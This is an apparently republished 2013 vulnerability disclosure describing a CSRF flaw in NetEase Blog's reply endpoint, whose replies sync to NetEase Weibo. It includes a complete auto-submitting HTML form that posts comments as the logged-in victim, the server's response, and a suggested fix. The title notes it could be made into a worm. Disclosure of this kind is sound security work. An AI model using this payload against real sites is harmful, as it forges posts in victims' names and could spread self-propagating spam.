
A CSRF in NetEase (网易) that spreads from the blog to the microblog; carefully crafted, it could become a worm

2013-05-07 13:10

1) The defect is in the reply function of NetEase Blog. Replies posted there are synchronized to NetEase Weibo, and the endpoint does not validate the Referer;



2) Log in to NetEase Blog and run the following PoC;


<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method="POST">
<input type="text" name="callCount" value="1" />
<input type="text" name="scriptSessionId" value="${scriptSessionId}187" />
<input type="text" name="c0-scriptName" value="BlogBeanNew" />
<input type="text" name="c0-methodName" value="addBlogComment" />
<input type="text" name="c0-id" value="0" />
<input type="text" name="c0-e1" value="string:fks_087065080081084067086083081071072087083074083095081070093" />
<input type="text" name="c0-e2" value="number:12979759" />
<input type="text" name="c0-e3" value="string:" />
<input type="text" name="c0-e4" value="string:ddd" />
<input type="text" name="c0-e5" value="string:i_majia" />
<input type="text" name="c0-e6" value="string:" />
<input type="text" name="c0-e7" value="number:-1" />
<input type="text" name="c0-e8" value="number:-1" />
<input type="text" name="c0-e9" value="number:12979759" />
<input type="text" name="c0-e10" value="string:lli.vip" />
<input type="text" name="c0-e11" value="string:%E6%9D%8E%E9%BB%8E" />
<input type="text" name="c0-e12" value="boolean:true" />
<input type="text" name="c0-param0" value="Object_Object:{blogId:reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12}" />
<input type="text" name="c0-param1" value="string:" />
<input type="text" name="c0-param2" value="boolean:false" />
<input type="text" name="batchId" value="675126" />
<input type="submit" value="submit">
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>

The value of the parameter "c0-e4" is the reply content;


3) After running the PoC, the system returns the following;


//#DWR-INSERT
//#DWR-REPLY
var s0=[];
dwr.engine._remoteHandleCallback('675126','0',{'abstract':"ddd",blogId:"fks_087065080081084067086083081071072087083074083095081070093",blogPermalink:"blog/static/129797592013126105133453",blogTitle:"\u996E\u98DF\u5F80\u4E8B\uFF082\uFF09",blogUserId:12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 ",lastUpdateTime:1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0});

4) Go back to the Weibo site, refresh the feed, and observe the result;



Fix:

Validate the Referer header and add an anti-CSRF token to the request

Source: www.2cto.com/Article/201305/208590.html
